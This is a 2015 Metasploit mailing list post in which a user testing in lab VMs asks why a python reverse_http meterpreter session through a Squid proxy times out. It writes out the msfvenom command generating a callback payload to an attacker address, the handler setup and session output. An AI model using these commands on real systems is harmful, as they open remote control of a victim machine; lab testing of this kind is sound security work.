Metasploit mailing list archives

python/meterpreter/reverse_http timeout


From: "Mike Jones!" <property.of.mike.jones () gmail com>
Date: Mon, 2 Mar 2015 12:35:01 -0800

I'm testing payloads through a proxy in my VMs and can't get any
meterpreter commands to work after the session opens.  All VMs are running
Debian.

Victim: 10.17.24.128
Proxy: 10.17.24.10 and 172.16.22.10 (running Squid)
Attacker: 172.16.22.22

I've generated a payload with msfvenom:
msfvenom -p python/meterpreter/reverse_http LHOST=172.16.22.22 LPORT=8080
PROXYHOST=10.17.24.10 PROXYPORT=3128

Set up a handler:
msf > use exploit/multi/handler
msf exploit(handler) > set PAYLOAD python/meterpreter/reverse_http
PAYLOAD => python/meterpreter/reverse_http
msf exploit(handler) > set LHOST 172.16.22.22
LHOST => 172.16.22.22
msf exploit(handler) > set LPORT 8080
LPORT => 8080
msf exploit(handler) > exploit -j

Executing the payload on the victim looks fine.  Session hits on
metasploit, and I can interact with it but none of the commands respond:
msf exploit(handler) > [*] 172.16.22.10:52399 Request received for /x5LW...
[*] Meterpreter session 1 opened (172.16.22.22:8080 -> 172.16.22.10:52399)
at 2015-03-02 14:12:10 -0600
sessions -l

Active sessions
===============

  Id  Type                       Information  Connection
  --  ----                       -----------  ----------
  1   meterpreter python/python               172.16.22.22:8080 ->
172.16.22.10:52399 (172.16.22.10)

msf exploit(handler) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > ps
[-] Error running command ps: Rex::TimeoutError Operation timed out.

I tried setting up the handler with and without PROXYHOST and PROXYPORT,
neither way worked, though I suspect without those values is the correct
approach.  What am I missing?

Thanks in advance.
_______________________________________________
https://dev.metasploit.com/mailman/listinfo/framework

Current thread: